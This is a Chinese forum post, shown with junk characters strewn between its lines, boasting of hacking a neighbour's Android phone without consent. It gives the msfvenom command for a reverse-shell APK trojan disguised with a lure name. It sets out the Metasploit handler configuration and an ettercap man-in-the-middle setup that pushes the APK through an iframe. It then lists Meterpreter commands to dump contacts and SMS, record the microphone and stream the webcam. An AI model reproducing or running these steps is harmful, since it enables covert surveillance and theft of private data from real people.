metasploit+ettercap中间人攻击成功入侵邻居手机

admin · 发表于 2018-10-20 20:30:37

$ K# H0 |( Y1 z$ S( `0 k6 x 五、msf+ettercap入侵邻居安卓手机 ! s, ^4 k7 Q- h

! v% J- K6 e9 c& E+ v, I 首先启动msf ; s, d# r' I& h- \

- a, g8 [% \: u! b 先用kali生成一个安卓木马，如下命令： 6 F; g2 D8 |% p$ y4 Z. T/ X% D0 ?

) `7 K& N1 g8 p' E4 P Msfvenom -p android/meterpreter/reverse_tcp LHOST=192.168.0.109 LPORT=44444 -o ~/Desktop/ribenav.apk , n- H b! x; W; \; k3 C5 M

) H( X/ G/ a2 e6 g 为了能让对方下载以后安装我这里将马的名字命名为ribenav.apk,哈哈邻居可是个“大色鬼”，就不适用替换下载的方法了，据我所知，邻居频繁使用手机浏览器浏览新闻 , r, c% U2 I5 ~; \8 a( u( n" n

2 A; n' l+ x4 `; t0 A! z 然后进入msf + J# v. o( M) Y- B l

" D* L5 x3 @/ C. P5 d3 j% q1 u use exploit/multi/handler : d* u/ L m% ^- u* S: b" j3 x

# r! L/ k( ^2 d: [2 Y- n set payload android/meterpreter/reverse_tcp . d/ o) E9 Z) I7 W5 G D

" x2 H0 L7 S5 A, m: p( j3 @ set LHOST 192.168.0.109 //ip为kaili的ip ! n" \6 e G! H; Q; d

- {1 O. f+ ]; R8 x- W set LPORT 44444 //端口一定要与前面生成的木马的端口一致 ' A$ b7 e* J$ H4 L# `* }% n

& w. J, V$ B( F1 V Exploit 4 D+ @6 I. ^9 D$ [3 w& d5 r- Y

0 r: @0 X$ J; b7 G 2 {* P! z: j: S& K9 |

/ x3 Y- Q7 T2 @) f7 Q% @ 下面我们开启ettercap -G : ?9 ~% `9 P) C% ]5 a/ H- y

" \, {5 e( f8 N% X9 k: \9 a: ^$ f 我物理IP为 5 t" B9 a1 y4 u2 U

: Z* Y/ Q2 S3 w ; z! V0 {" ?$ I+ r

" r+ ~5 T2 Z% Q0 D* `0 P+ R p 别到时候再把我物理机欺骗了，之前测试物理机只装腾讯管家是可以成功欺骗的， # n$ V/ y8 n/ a5 @4 C& k7 U' x

2 L1 \0 q4 V: [ 下面我们来设置一下 " n* S' b% f3 O" H9 ]& _

, |6 k- K* j' H3 F( n5 w ! d2 S: f5 I5 a I& q+ U

. n- t. G' {, Y8 x8 J 在开启欺骗之前我们先把生成的apk马丢到kaili var/www/html下，并创建一个index.htm文件内容为：<iframe src=http://192.168.0.109/ribenav.apk></iframe>,因为apk文件嘛要想直接提示下载，用iframe语句就OK了， 4 ^! b" s7 r. `( D) |% o

8 ]* X8 E W- U. S2 N/ r / l# E$ [" ^& g& e* B9 k A

1 T) X2 g* D7 b ( b$ b9 I3 U# ]5 f5 l0 l7 C- g1 F

3 V2 t+ ^( a3 ] 9 j V: a+ |6 c

2 z2 s0 G, e5 _+ I# R 0 K: X+ n4 T( D$ S( d; A

( c# T+ ?8 r$ X0 [/ W9 S 1 e% v! m% Z6 t, \4 ]

* y2 P. `8 c8 K4 I9 A4 w & Q7 j R: G! p

/ Z. A1 q! M1 H' ` + s2 j B$ b) X( L9 I- W" g

# C$ J. j6 j8 Y5 N- h' f 0 }2 e5 G; c! i$ f3 v+ l% k

: _6 K: O/ Q% W# M1 e U- U# { ^1 g/ m* y$ ~* J

! m- y: l* J9 u k7 U- j7 ~ 1 f! K& A2 a6 n

& ^4 m0 L7 o% M / l: H! z" ^0 e& i. w9 |5 Z6 @ }

4 x. I" V( m U$ ? / p# ]0 }, ^2 A9 i1 D5 \5 ?: q

4 M# ]: V1 W; s0 o8 ~ ( J7 n7 D$ I% `- i( d% Y/ U2 w

, F# n2 `% P2 q* @/ C% k 下面我们开始攻击 . ^& q: v# `2 D# D& M6 p4 i' A

- I9 E0 S" c9 R2 x9 h 1 r$ [9 b& f% O+ Q9 a

. H; X0 @# E' O A & T, h$ m9 r: ?/ @' v' Y9 X

" I1 w! b, V/ J& r. @ 5 z# V* {! N9 l! |& z$ D

# M; B X' q0 ]! w# a& X4 }( A 9 F; j0 k# B% a) o: _8 o3 [: Q

! D$ Z7 L6 V5 Q# y0 I% J$ t5 H# | 6 l* _) O) |+ y4 N) _

+ q6 O. t2 h8 L0 u$ e+ }8 S0 O& v 大概过了5分钟多，发现反弹成功了 2 c8 V* j) ]3 l" ^/ }3 o# F/ P6 Z

$ c) {7 X3 C9 |- f$ P' S $ K" t8 o7 Z c8 y; g

: ]$ ^5 D: t! d6 M $ L& T: h7 p' v6 G

( F: j, Q L" v0 s, Z * G% p6 c, F' J5 k

( E b+ G+ p1 y! ~4 }) Z% l ( Z! C' ?1 p# u% l

- w5 K, j1 S4 q; n, g n) N- n 9 _$ Y) a5 o6 H* f! m( n5 J

( q) h7 A4 f; f. F( o ( R# F3 D; Q' |

$ {( G+ |4 I9 b' I+ M2 j2 U . q+ T: W/ i$ H4 _) g* n% V

f: d$ N/ v4 F9 C& U 执行命令 ) O; g ?: r" I1 ]& I5 A2 T, l

7 b, y+ v$ M6 D& } ; u$ |# ~9 w, F) {

" A: L O7 v7 A) v) N0 V% l6 G dump_contacts --》这个是导出电话 " u6 q* I C, U: B: {$ v+ T* z

( Y O3 Z( h k5 D9 t" z dump_sms --》这个是导出信息 + F6 C& m; ~" f9 [; Y

* h- x P: P! M" G/ `1 k record_mic Record audio from the default microphone for X seconds 4 T( N% `$ _5 ^' ^+ {

* C* S- \$ Q! F9 ~$ t( f1 F webcam_chat Start a video chat / k! Q# _# q( T1 }# O

1 o( ^' F' Y6 }7 o, }1 Y webcam_list List webcams ) _) O$ b$ W, r" @& K4 J

$ l5 s/ q; o% T d9 K4 X! Q webcam_snap Take a snapshot from the specified webcam . M- }* A- n! v; A2 Q: o6 v

& |/ s: O9 a5 f! e! H+ p webcam_stream lay a video stream from the specified webcam ( A9 m4 `3 t- h0 [$ A$ ^

$ d) v% X# B# b # X; \# W" H* U N7 `

- ~3 R7 L( w- c 7 D: c8 s$ o& a+ Z; a) P1 E, W8 V

. ?8 e$ P: J1 O/ D 我们打开看一下电话薄， 1 w/ I' D- P8 B: i" L5 @5 P5 n

* {2 Y1 g+ ~ ^ V+ M : Y7 j9 u- B) m ^

" n' B! [* v1 u6 X, n+ Z; M# C 2 \' ^) t4 L/ E9 Y

# D P% I H/ n 3 F+ G4 N: S* d5 }, J, L0 r

! W3 z7 X! ~- Z9 a8 {0 }+ f1 g % X9 Z8 ^3 s2 ~' T5 Z' w' m3 i

/ \1 P% j, U+ N x$ F8 m9 I$ g : J5 h6 \) z3 }* t

; V% E0 ]; b7 G 1 W# k- A! S6 B3 S8 H: W u

8 ]1 |1 Z3 `: S3 _1 n4 p* r 我们同时欺骗成DroidJack木马，使用方法如图： % O- Y, s- t5 ] B) K V* u7 o

) A$ R& f' U0 C8 S . E7 W4 j1 q# w! Q+ g8 r! j

# s g7 c. i& E8 b2 m& O # `' z5 ]+ c/ K2 _

# p' I6 w7 ]7 _& l+ A5 ^! s: e% S! c ) @3 h3 b) C4 t) @" R4 r

' E' ]! `/ d% w# P6 P- Y! b 切记在前面生成完马以后记得在这里选择开关为on，并且对应前面生成马的时候的端口 ; v5 a4 D2 x/ @5 D# J6 r

- i. J! |* D* @ 5 v* C9 T4 W( k3 I+ A& z% r

5 z0 v7 m& H* S- a- m4 u1 Y 6 H: Z3 K0 F7 v& l; ?

" P0 k% d z) C& o, H6 S$ p % R5 r6 @5 ~& n: J0 D; ~

- K! l% \9 t5 b8 S' V: c % `+ u2 b. H" B8 e

, W) C3 o8 h8 C4 y7 A
: X2 J5 T( {4 q8 N

		自动登录	找回密码
密码			立即注册

metasploit+ettercap中间人攻击成功入侵邻居手机

浏览过的版块